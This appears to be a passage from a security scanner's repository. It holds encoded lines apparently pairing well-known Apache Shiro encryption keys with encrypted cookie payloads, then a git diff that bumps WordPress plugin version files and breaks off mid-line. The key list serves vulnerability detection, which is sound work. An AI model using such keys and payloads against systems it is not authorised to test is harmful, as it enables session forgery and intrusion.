+empodDEyMwAAAAAAAAAAAA==:XH1jRHDFPGxkA/GXSQ8Wf6y+gWQY8Y11dDxnvKQy7pFthZJOSYMkOZMgqmrGK39h+oPJC+UOydqzH6G7552cgd93GqSvjl06jGMWuTTJUPOE5S2/PZgZNkicyb9l4abPHjTQvUeSustFEEtBQX83IGrTYQzvuEXsEznw/AlrGIFHLUh/uOmgzkDzlF6kv4KlEVGcpE7FHDE/kBGHpxQMyT8Eka88rdMXH5R2d1jHvoLKfjRRJwxYUcFiF301NQgP8ZGd5fbEDxikEfUkTIKxG7d9DSFVJOJsVrjhJ9XRtfY6wpwHX/kI1U0D/9lttKQL7U9BSSpJ8Hago/+om3C7LypJFu4vDA+ntTIdO0XHmpRzWnrkurZYnX0JrYdFThvlqkCAgVKeKfgkMeb9UwHNZMBIc41U5jnwECWjctHr7SRErhOOSqQfpgPCe4lG/1fq2X1jgMFe0CD5dG53aYd0GdzKg9ZS9tOvjh/aoC/24G9nVxd+y9eXkjCEMAOzoa8JwC7rIKyLpgz7X364l8rQaNGtIhJgn7WasMXwWnbzgXo= +A7UzJgh1+EWj5oBFi+mSgw==:K9KN+EMlF81hzaETBtBq8TccUSKh+aJl0Mx0ET8cgERrocsovJKrNemC2PfUFdhwPy5Up7m47txaMPuN4E0VzfK4p+3ObwTujyEF7b2MNqyVVmzx3MOT9Ls4jEr0eImr+cSirdFPBmzMaiP3skwSX8Eg1YmP5sJQW0ZvrF9nR9z9AGEFMi1UguEZezjliLEpUGY+g5Tad723iBgd3Q/2rGIjo6eXf0lH0iTDpfZM/Oq2HUUz+nPcajZey4GsaaTFWt8nKyhJBTSDWTErrnE41NtpyYFPp4UWQWRzcXlg7cqVZHS+AQ/Jp6CPGbXY5P9Z763HN55cSWbiGrRnZCQyi+sVR0H1okTaB7hwif9ouaaW61dPHPxMDdlcI7cEV8uI4eS1zDfzdTyvjbhlvfQgTIajENn1gHKu/xTVGG6gJ8Ix8wO1eDloet1EOcFZ0tgHs4nKpZoRmaCw75b6at9v9QX1qUniZ8TKr4Au0BCIKT6uTM+S/DHQ1FOsR3vh6TG3Ri5DUmj1TOILFtpRCcntAKgg1/X+H/FgjipePZqOQ9o= +c2hpcm9fYmF0aXMzMgAAAA==:5+iZUeoglwkizt6lMYbovmoo5VBrQeI/MSLg1lrJ4FKlH6dBgVKNFIJCeSSVqcsAmzRmHQX4P22sRhXcAzt3JBxE92OpsHJCQ4pA9A3Dx05fUZLnR6r0njDCN3Sd+S5D92jrk9vRrfQ3rNiRz5uCpoQVh541IOt9FAwja9Xfq4Oa/2oKscKPM8q6MLdU3Th77J/1GmeJznNfzwbt9r+uTCYss7oSUVRVSBZVIC4gTVMDYzvg3GfzdQom8QDEKbp3BMiB/aQkMqYNQ5la3SLUL9rGvQEfD46ZdInW7LlWNWWd8wTx+3RMB1WLLu18BYzy0FUWlJASaLOlwWWghLZggsOQRrjYZq0ygOZqpUYoD6It2quJjO41BExwUz1+WUR1Dk+KSrv+B14R65z13OI46JYz553XJBnEN4w+z/8PuHewHs6+scd5kgsRWdOT6fRNYshFFU2Ob1UJeu/kWg6c+4oIsRUcZr2S58BNNwUr31Fb/bl905qRFOl7wC8nLeWPjrxsG5dsYsh98ArJArDjte2e5TgsCwzNsvPJSWuV9lY= +i45FVt72K2kLgvFrJtoZRw==:LDgM2RLvDhLB/GDDDXwlSmyl5frMbggtfZ7UQbpM6t4VK0QVCYcHNCifWY7WPZaEZO5nKBJr59KcgvyD7ffLU3BEYkXcb0XaGzn88Ds+BbYzZgtmuG87VdwkjhyWrKPxMh4/eZncALoxiw6ISO/0YlCq+Io0JCK5EsZeMystJEnKzVP/jjaaIC+ISLZJdAqWEycknyKY+1z0eZwKfc15hoBMpn7/HxV4ieatitE/lHrh/qMHgTWZZM1tPg+NzbXIu1eksgcWOhIBeZ19XuT+AT6WZ/1e2JWOt1pqdXpa3J8AOh2KDMKCkpfMQNHkx0YZrhG68t2td5sa8iKRdmohMWOY4FTJM1AuH98aLVciXMNuH68LFDpY09y68FF4mo0ifHeFuurdJRGkPpErm0O+OrKPwt6GhmvS8KA+zUl4idX/1VAlLAvKnIXZaskQA+lGkpLD3U/BP9/wYYtpyQcgi+NqlyxIYPIwx+eO66v+QkNYvTqEWOcs4AcWaQ5AX/mFIVGLTNdr8wmoLHgLKtdP7JOhMV4R6wAERVq3baCqxhI= +U3BAbW5nQmxhZGUAAAAAAA==:Jofo1QeruwgPYjNN0o1XVduySoOFloaICyWvGB8xB1rku0uhfoQPXP3hgPmjfF9zxLLBlbuE2b/73UxuEJ1sNS8oH88savOgnxSQnGQV5tE8MoxsEqKgXS28hAcInj6CQyLZkgfWHI8mUojWiiH1siyJe5DlfBDwivHJBNi6P5yjePJQ1qWCiLdrsPFxHX+5PDdEb2XGbO8cxDRPLLH4rKVF9cSqH+1F85DRpamvqqe9rX6c0UsORxFx2eN1VjWzO0RH8RLpWCrEsWENIVqTknPPeBImcjyGWNOsqePIP3nxUb/xTfWjFEUg4W70DLy8EflDLxrF/xsADRzxruCDVqu+3p1j2mGYfR6LHRLSelwv7gksdeDdFpasKcO+WAxcgxME7dj3WWLueQ9mRDnQqAWIFrIIX3RPlxS/Ou0GK9BYVzFWJ6cUPUy9yGFDFFIwKwyw6erJ6G0aRvmHyYDFBErdF5PZ1WW0UQ1U1ghS5JsHjf5gHhaiApEUEuroYrYzRTO8wL4MIx9NRuovsgWMwn156QodqrRNyiHev3Pmb1A= +Jt3C93kMR9D5e8QzwfsiMw==:CKKIsDg2JMQjigmtHHz58eeL9W/DLONPBEkMyZqnDYD4azkq1H/VJM4oTKkz9F42W5MdyxpabueKFPeery9fSjNy1cH8ByvgSLkcrFVhTq0lRLY04be4oLWjXAHq2MMycdyozEhmzvQ3rcTh4/7Vzb2ziQ0iroHH38vXUVsYUkE/qr+BH1cEAh/hC/k4ge40W3tNHaK3hyT6Eh9Dpn7+8lAk0jAOV8ZGA/16TSQOMtjVq4EOzCBwUCauORXXbKu2OwSdrisoRvfzQbXA/mLyInJIU/eRXoJHZmcuDMzn9ebCCs265ProdjJqEsV8coByhDxOr7J+vwJ3Z9DQyfLf1xBJzQ5FqYIoD1tbhijAFu+oUJcCO8CcbqZhPESxXkFpPfiNP5IrpCxIypFiUpvRxdsDRMEE6I5QnfudsCmDTMIOP/q8HwtkuFyomzgYUUaarOWjqoP798PKanto5xd4KLmlC5Sc5PA7rG17Zin0L5+z9df9jtHANhwaErmitf73mvj09AyoV1G8MpcdxywChzOoOdUCoAyQOHIFcVH+7TM= +MTIzNDU2NzgxMjM0NTY3OA==:uqVaApvtdZdkyLCSe2aatuSvwhECUuHqCDL0fA618hm7b2wAS9LbGNbtzHmsPlS89YZUuMUvrV8EhzZwu2jQrHGVVHbotzrGKpwcwyENqD3cafuULIkgk512EgJpMvCzWIEXhA7Szc3MGr9btkzxel0hODyJkhCghgJ/LQpPRmH+GuXuaEbIXSrD4bddmIWgqJjPEULFMVC3AMEG4W3kcLP3dbg7/jBrN10+B8pjEy5TTf/tILF3GMhyGDPWVCIakHCbQNOowvG29JI3gESSMyEVy2zlx+sz+xBi4UrAJYckT+etD2XCfDsHissff3nMVMi5WSVqygaFra2UTa2q9jp/NkO8C+8XpBI9MuupOeXVlaFNUhJA+Ce/0hTyiVqg5cb0bySIIQvwjHCqK+Dbgl19CGIaRftvuSxZHrjih/qPCcDu4Yc+oNGP+qeKbO8BlVFcspxqIiaibtyKHSBiHApPSEujhI+k/HWqqzYH7tOnzjrcNd8LoxECBdb4Qv3EWKfliUsXg5TAtqIW1UkF4B//doAze/SA4LKCQ/WdU8A= +vXP33AonIp9bFwGl7aT7rA==:k5JerpAVAXUDlQrjm5F4aT0jigsf3qa49i7caYN8m/wLfRxKaP83KAKuwa4oFhkjLve3wDi3YUDj1JBBvVTIx7HhHxeO2z5VaPCZde9kq/2pp0+R3qzvFlRQa3O6s5iNSkSPti6UOfXwEeIR9xBi0rvhfWPDHt95G+TTR9bdiN6SKQbggRRUhloO1aqIRdm2GDEmwWQXf0756dKNiVayU+OFEIYrgIRJAIcSGBLrZrIurcD2bKlamdI0pAMln2CkHTKKsBfDzG0j04tkFhXcM/SnOh+SohLP5ddOD/OdVUNxmM42tlQ8lyCIPKU48qgYQRwgF/lAVux5N8cOqNtVUOO13PtDPxJyycnVcKnQ+RIlXf0x9QUJW1JZD+YRIEpZyuisNJW70UddJypP2YcnbiuNXGni0a/PBP9bxJXLmejq1SdtpL2GGUOeeiciys0kaEIsldhHGuGAUQvSBAlpd8YOm6S7HSgh8ZNtHPWcFbEazyL12P9mnDTXQwmtPdljpRAvNyHm52LiK+aPzILDwl26xcxhXhDq4Eznv5W4lvU= +V2hhdCBUaGUgSGVsbAAAAA==:hFyL3b+toX9F69S6dw88ue27+TK3lQp1CQZt3K52AzL1V0RL/JkAhrvVOOT8tMUk6+Aq6Jor3lHkm1EnjjQZMZ41S0AtmTzXOXOZgkbRKjtsvp9AK4VYugC9PIV8lToI57XbQCvu+yuCVnFMk3Kvb/9FwJqN0KUJ52+w0IoGP28UjPlqgqc9IuKFh4t3a2qZBDipBl7FYCzt6B40rk7cCzzfqm106AdoABsZd68hLwG/1+Pyo177jhvsFfQtZCeERPy8wmMgCvECBKE+yCW36I+YUTPklqipSPKpZdTGJgC5Jn6TjxfSDvpXx2bTmkjoZ1JWi9WENiZadO1R3Zk+1+kX/vFl0nKNjEN1AdOsLADxqIk70NDgbN8tmH1Nxq//M195VeAqgFZiqwvn+cB7/r8+dZvhXx25WWvka0u6LXFV8J0bV+1WAXjQhB/xKCxAuI67Lqma3OQ7OFHbwrzEUNh4Wo8NBdIaScYdwK9ZoQ0A4Ks9klFg/EaEWr39C+dbGP39GE8Ddp9VUdsJUHnuDLeCAjUkJ1XAwRgauWXMiM4= +Q01TX0JGTFlLRVlfMjAxOQ==:LCR/PdrkxDRYCq4Wj2kK59JYNb4m5sVI6QXKV10gjOBdfAHN9liVdY10suB04rdM1FC8VQUuDD1pbOGzsA+x/k4YC90qrLqn9qKcZ2OXMWaKoV6YBkV8oonYc5k40VVTjXOs35tTR9ftZZuEvLlY2I/dEmwLg71eDSj4Zb9CQD5fR1/5R+A/0CS0oQBiazyVg7oXcUEahTScmgSeXDUmnuVgDNYWjoP/ZYWsHIVWVMDk7TN+ietvBL5AyZ5FHTDQSh67VjVIGJ6JiHMfFY+YEIkaxkAhPZVaC3R9CbAvcRHqXDpuL44Q3cXd7B4UfHczTrffvz3IVgzl+3xK9l13teof6u2LFHOvfKYx/5EcsEhKPW3yjyZlvBwDhoRSL1CrO7b80utMRDO4OzqHvnZ2YLVklLIch95SuGzHsH2a++IabaUdTM+jO33yyCXCcAVQBxUP7VmHXGreqwOYl1O59i/NNo0Vvuu9eEq2OOqE1WCOPgRLHBeknWHq3IS+AFZxY3eF8tV+bGthYovRZea8cNZg/9pUG3lbuVSMDLY0cN8= +66v1O8keKNV3TTcGPK1wzg==:hF4AN/CHT0Lm8NhymLwsu+qdDfD51Iu+w20ZkIu3rkNNckfh3bnMxP/TxeZLGyyOigYu+fqzUUOivV++OLtE6EweCG791gm9P+rDaMz9nNPVRarK1n/m7hNbgy3d4+regnEYEkSQF6TZTuwwmYLvRlMhO9xCcayamJ9YJIzFBNn7A6vakU15EKNWgsXUc0Pi65tBnxFS9zOdbokux4jH8uxFh5h4vcStNDYs1LbiwABrq+rgs1aHgrayDsReJBUjL0K6SfMu8mo6ljpN6ONPmwiTdCd2uGmKOY49GsjnGCaDUqBJ7DfrzOM+BFvYNq3jVD+p4/AAWyppE77g87+fNpFPYDYVDuiwVPOZ1gGfM/9tuFwOLeicW4RE0t6ceStphiRc2HhRDwM+dzfCF3Hkc+0U/uFRxrp+EkJ8YSUWw5Xat6LofoPZHQLGTNSYnDYrinPHFIFHi+YIW1UE/u1gakJrv1UvKtZlXblEBRM7qypDXdM4adXBhIS8dR1DqZbMNEVZpEnsA2FyJrGv6JyQIbpyXkIu1uhDjlmoqgpJtY0= +SDKOLKn2J1j/2BHjeZwAoQ==:mCPAMufTIgWYnkYaOMLGL98kB4Q4SU9xpo5nV/TxOMNYLPEC8TUkJLMiSs6sUA1/ywCd7A+YqxfbUB26AXW0Ii6XCwAxG8ZiIw9XUtMMT7hbaFRF/JZVgCqYek5Yl/xqJvhC42gu4dn89evIO2m2kA5fvpWcWlyWoeDHAxeudE1JAtkNi5YNXFfUjoMSZO40S7I84djNG4gisP6lQeu8Dkz/VxcViQHb6yuA/Cvbwye/9IMXv4cBVed3gYhkPxp6yL7C5D2AwQoa7bmXYAXZP6BtQN0Kuj4UX72XHTa8IZYA8Pq0TjH1YSnGoapLfAg6Le3yNA/LMkhd9yTaH47wsE/S+U/Y8D7DNK/McEJqrNebtVBS2/tdR+riVWHrqSajqnofTlvCLqKxz0hz73/ofCqewZ+pOQ6/fDnRE4T/Dr/A7EkpX4kIZt1skwy7K6tL7ZO/mZBqGOlYSRjQKXLbnYKNq24JK6AwW0efwU2Is9NZEtbjfQCZpd+idLf0mMQigwMP0jDXohF51ckoCFMVHsNuHvEZNHF41zvnqBN4n8U= diff --git a/helpers/wordpress/plugins/ad-inserter.txt b/helpers/wordpress/plugins/ad-inserter.txt index 64a0fd97bd..954bbe23aa 100644 --- a/helpers/wordpress/plugins/ad-inserter.txt +++ b/helpers/wordpress/plugins/ad-inserter.txt @@ -1 +1 @@ -2.7.29 \ No newline at end of file +2.7.31 \ No newline at end of file diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index b816207073..35d51f33b3 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.11 \ No newline at end of file +1.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index cb6b1ffdc8..30bc70ba1b 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.1.7 \ No newline at end of file +6.2.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/akismet.txt b/helpers/wordpress/plugins/akismet.txt index 341d0b550f..11aa145248 100644 --- a/helpers/wordpress/plugins/akismet.txt +++ b/helpers/wordpress/plugins/akismet.txt @@ -1 +1 @@ -5.2 \ No newline at end of file +5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt index 8012ebbba2..89f71c74ce 100644 --- a/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt +++ b/helpers/wordpress/plugins/all-404-redirect-to-homepage.txt @@ -1 +1 @@ -4.2 \ No newline at end of file +4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-seo-pack.txt b/helpers/wordpress/plugins/all-in-one-seo-pack.txt index da3a40311f..de54ea0106 100644 --- a/helpers/wordpress/plugins/all-in-one-seo-pack.txt +++ b/helpers/wordpress/plugins/all-in-one-seo-pack.txt @@ -1 +1 @@ -4.4.0.1 \ No newline at end of file +4.4.9.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-migration.txt b/helpers/wordpress/plugins/all-in-one-wp-migration.txt index d63eb35c4b..248cb03dc3 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-migration.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-migration.txt @@ -1 +1 @@ -7.76 \ No newline at end of file +7.79 \ No newline at end of file diff --git a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt index bd96b42f46..e60200b54f 100644 --- a/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt +++ b/helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt @@ -1 +1 @@ -5.1.9 \ No newline at end of file +5.2.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/amp.txt b/helpers/wordpress/plugins/amp.txt index 58073ef8d7..acdc3f1b0b 100644 --- a/helpers/wordpress/plugins/amp.txt +++ b/helpers/wordpress/plugins/amp.txt @@ -1 +1 @@ -2.4.1 \ No newline at end of file +2.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/antispam-bee.txt b/helpers/wordpress/plugins/antispam-bee.txt index ac569006a9..9fb6511900 100644 --- a/helpers/wordpress/plugins/antispam-bee.txt +++ b/helpers/wordpress/plugins/antispam-bee.txt @@ -1 +1 @@ -2.11.3 \ No newline at end of file +2.11.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index c4a602db6e..5141b615b4 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.2.6 \ No newline at end of file +3.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/autoptimize.txt b/helpers/wordpress/plugins/autoptimize.txt index 301a9a951c..7d8ebf9eef 100644 --- a/helpers/wordpress/plugins/autoptimize.txt +++ b/helpers/wordpress/plugins/autoptimize.txt @@ -1 +1 @@ -3.1.8.1 \ No newline at end of file +3.1.9 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index 0c89fc927e..cc868b62c3 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.0.0 \ No newline at end of file +4.0.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/better-wp-security.txt b/helpers/wordpress/plugins/better-wp-security.txt index dd9a10b692..c9277c5a60 100644 --- a/helpers/wordpress/plugins/better-wp-security.txt +++ b/helpers/wordpress/plugins/better-wp-security.txt @@ -1 +1 @@ -8.1.6 \ No newline at end of file +9.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/breeze.txt b/helpers/wordpress/plugins/breeze.txt index 46d9844b78..28c12794c4 100644 --- a/helpers/wordpress/plugins/breeze.txt +++ b/helpers/wordpress/plugins/breeze.txt @@ -1 +1 @@ -2.0.26 \ No newline at end of file +2.0.31 \ No newline at end of file diff --git a/helpers/wordpress/plugins/broken-link-checker.txt b/helpers/wordpress/plugins/broken-link-checker.txt index e3a4f19336..6b4d157738 100644 --- a/helpers/wordpress/plugins/broken-link-checker.txt +++ b/helpers/wordpress/plugins/broken-link-checker.txt @@ -1 +1 @@ -2.2.0 \ No newline at end of file +2.2.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/child-theme-configurator.txt b/helpers/wordpress/plugins/child-theme-configurator.txt index d5724cd41b..bd4053bfb1 100644 --- a/helpers/wordpress/plugins/child-theme-configurator.txt +++ b/helpers/wordpress/plugins/child-theme-configurator.txt @@ -1 +1 @@ -2.6.2 \ No newline at end of file +2.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt index 21463eaa41..7f71317e6e 100644 --- a/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt +++ b/helpers/wordpress/plugins/click-to-chat-for-whatsapp.txt @@ -1 +1 @@ -3.29 \ No newline at end of file +3.30.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cloudflare.txt b/helpers/wordpress/plugins/cloudflare.txt index bcd250ed08..ea64bf6897 100644 --- a/helpers/wordpress/plugins/cloudflare.txt +++ b/helpers/wordpress/plugins/cloudflare.txt @@ -1 +1 @@ -4.12.0 \ No newline at end of file +4.12.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/coblocks.txt b/helpers/wordpress/plugins/coblocks.txt index b38ebbfce2..b532f3dc33 100644 --- a/helpers/wordpress/plugins/coblocks.txt +++ b/helpers/wordpress/plugins/coblocks.txt @@ -1 +1 @@ -3.0.4 \ No newline at end of file +3.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/code-snippets.txt b/helpers/wordpress/plugins/code-snippets.txt index 8cf6caf561..e5b820341f 100644 --- a/helpers/wordpress/plugins/code-snippets.txt +++ b/helpers/wordpress/plugins/code-snippets.txt @@ -1 +1 @@ -3.4.1 \ No newline at end of file +3.5.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/complianz-gdpr.txt b/helpers/wordpress/plugins/complianz-gdpr.txt index d4563d9c5d..0a0371ddf5 100644 --- a/helpers/wordpress/plugins/complianz-gdpr.txt +++ b/helpers/wordpress/plugins/complianz-gdpr.txt @@ -1 +1 @@ -6.4.7 \ No newline at end of file +6.5.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-7.txt b/helpers/wordpress/plugins/contact-form-7.txt index 9b4bab7a7e..182ea559ba 100644 --- a/helpers/wordpress/plugins/contact-form-7.txt +++ b/helpers/wordpress/plugins/contact-form-7.txt @@ -1 +1 @@ -5.7.7 \ No newline at end of file +5.8.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/contact-form-cfdb7.txt b/helpers/wordpress/plugins/contact-form-cfdb7.txt index 246d157007..bbe7f25a46 100644 --- a/helpers/wordpress/plugins/contact-form-cfdb7.txt +++ b/helpers/wordpress/plugins/contact-form-cfdb7.txt @@ -1 +1 @@ -1.2.6.5 \ No newline at end of file +1.2.6.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index 50e47c89ca..8a4b2758ef 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.1.1 \ No newline at end of file +3.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-notice.txt b/helpers/wordpress/plugins/cookie-notice.txt index 158349812d..35f29eef64 100644 --- a/helpers/wordpress/plugins/cookie-notice.txt +++ b/helpers/wordpress/plugins/cookie-notice.txt @@ -1 +1 @@ -2.4.9 \ No newline at end of file +2.4.11.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-css-js.txt b/helpers/wordpress/plugins/custom-css-js.txt index ce8ae45f1a..7526964c2a 100644 --- a/helpers/wordpress/plugins/custom-css-js.txt +++ b/helpers/wordpress/plugins/custom-css-js.txt @@ -1 +1 @@ -3.44 \ No newline at end of file +3.45 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-fonts.txt b/helpers/wordpress/plugins/custom-fonts.txt index 10bf840ed5..50aea0e7ab 100644 --- a/helpers/wordpress/plugins/custom-fonts.txt +++ b/helpers/wordpress/plugins/custom-fonts.txt @@ -1 +1 @@ -2.0.1 \ No newline at end of file +2.1.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/custom-post-type-ui.txt b/helpers/wordpress/plugins/custom-post-type-ui.txt index f31fa23a85..cd99d386a8 100644 --- a/helpers/wordpress/plugins/custom-post-type-ui.txt +++ b/helpers/wordpress/plugins/custom-post-type-ui.txt @@ -1 +1 @@ -1.13.6 \ No newline at end of file +1.14.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-comments.txt b/helpers/wordpress/plugins/disable-comments.txt index ab6d27898c..26f8b8bcdf 100644 --- a/helpers/wordpress/plugins/disable-comments.txt +++ b/helpers/wordpress/plugins/disable-comments.txt @@ -1 +1 @@ -2.4.4 \ No newline at end of file +2.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/disable-gutenberg.txt b/helpers/wordpress/plugins/disable-gutenberg.txt index 0a35d8c853..06a445799f 100644 --- a/helpers/wordpress/plugins/disable-gutenberg.txt +++ b/helpers/wordpress/plugins/disable-gutenberg.txt @@ -1 +1 @@ -2.9 \ No newline at end of file +3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicate-page.txt b/helpers/wordpress/plugins/duplicate-page.txt index 689f7fbd33..ae6e65bd96 100644 --- a/helpers/wordpress/plugins/duplicate-page.txt +++ b/helpers/wordpress/plugins/duplicate-page.txt @@ -1 +1 @@ -4.5.2 \ No newline at end of file +4.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duplicator.txt b/helpers/wordpress/plugins/duplicator.txt index 5ebba4f08a..03082db712 100644 --- a/helpers/wordpress/plugins/duplicator.txt +++ b/helpers/wordpress/plugins/duplicator.txt @@ -1 +1 @@ -1.5.5 \ No newline at end of file +1.5.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt b/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt index f21c0ae0be..5ce8b39599 100644 --- a/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt +++ b/helpers/wordpress/plugins/duracelltomi-google-tag-manager.txt @@ -1 +1 @@ -1.16.2 \ No newline at end of file +1.18.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/easy-wp-smtp.txt b/helpers/wordpress/plugins/easy-wp-smtp.txt index 50aea0e7ab..e3a4f19336 100644 --- a/helpers/wordpress/plugins/easy-wp-smtp.txt +++ b/helpers/wordpress/plugins/easy-wp-smtp.txt @@ -1 +1 @@ -2.1.0 \ No newline at end of file +2.2.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 5d737ca0ed..0caba26085 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.14.1 \ No newline at end of file +3.17.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementskit-lite.txt b/helpers/wordpress/plugins/elementskit-lite.txt index f3ac133c54..56fea8a08d 100644 --- a/helpers/wordpress/plugins/elementskit-lite.txt +++ b/helpers/wordpress/plugins/elementskit-lite.txt @@ -1 +1 @@ -2.9.0 \ No newline at end of file +3.0.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/enable-media-replace.txt b/helpers/wordpress/plugins/enable-media-replace.txt index cd9b8f559e..9d086c6dff 100644 --- a/helpers/wordpress/plugins/enable-media-replace.txt +++ b/helpers/wordpress/plugins/enable-media-replace.txt @@ -1 +1 @@ -4.1.2 \ No newline at end of file +4.1.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt index edb1d397cf..55f6aea298 100644 --- a/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt +++ b/helpers/wordpress/plugins/essential-addons-for-elementor-lite.txt @@ -1 +1 @@ -5.8.0 \ No newline at end of file +5.8.13 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ewww-image-optimizer.txt b/helpers/wordpress/plugins/ewww-image-optimizer.txt index 3769235d3e..468c41f93c 100644 --- a/helpers/wordpress/plugins/ewww-image-optimizer.txt +++ b/helpers/wordpress/plugins/ewww-image-optimizer.txt @@ -1 +1 @@ -7.1.0 \ No newline at end of file +7.2.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/facebook-for-woocommerce.txt b/helpers/wordpress/plugins/facebook-for-woocommerce.txt index 38be3a7bcd..6ebad14888 100644 --- a/helpers/wordpress/plugins/facebook-for-woocommerce.txt +++ b/helpers/wordpress/plugins/facebook-for-woocommerce.txt @@ -1 +1 @@ -3.0.26 \ No newline at end of file +3.1.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/fluentform.txt b/helpers/wordpress/plugins/fluentform.txt index 4d5e5283b9..d781ee7951 100644 --- a/helpers/wordpress/plugins/fluentform.txt +++ b/helpers/wordpress/plugins/fluentform.txt @@ -1 +1 @@ -5.0.6 \ No newline at end of file +5.0.12 \ No newline at end of file diff --git a/helpers/wordpress/plugins/font-awesome.txt b/helpers/wordpress/plugins/font-awesome.txt index 7e961f9e14..64b5ae3938 100644 --- a/helpers/wordpress/plugins/font-awesome.txt +++ b/helpers/wordpress/plugins/font-awesome.txt @@ -1 +1 @@ -4.3.2 \ No newline at end of file +4.4.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt index 8f9174b4dd..abae0d9a94 100644 --- a/helpers/wordpress/plugins/force-regenerate-thumbnails.txt +++ b/helpers/wordpress/plugins/force-regenerate-thumbnails.txt @@ -1 +1 @@ -2.1.2 \ No newline at end of file +2.1.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/formidable.txt b/helpers/wordpress/plugins/formidable.txt index f9da12e118..73092f345e 100644 --- a/helpers/wordpress/plugins/formidable.txt +++ b/helpers/wordpress/plugins/formidable.txt @@ -1 +1 @@ -6.3.2 \ No newline at end of file +6.5.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 7ad7fa0185..e43da41f67 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.24.4 \ No newline at end of file +1.27.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/ga-google-analytics.txt b/helpers/wordpress/plugins/ga-google-analytics.txt index 284f50ceb2..af9337a9d9 100644 --- a/helpers/wordpress/plugins/ga-google-analytics.txt +++ b/helpers/wordpress/plugins/ga-google-analytics.txt @@ -1 +1 @@ -20230306 \ No newline at end of file +20230721 \ No newline at end of file diff --git a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt index 912ed65801..c31f242c9b 100644 --- a/helpers/wordpress/plugins/gdpr-cookie-compliance.txt +++ b/helpers/wordpress/plugins/gdpr-cookie-compliance.txt @@ -1 +1 @@ -4.12.3 \ No newline at end of file +4.12.8 \ No newline at end of file diff --git 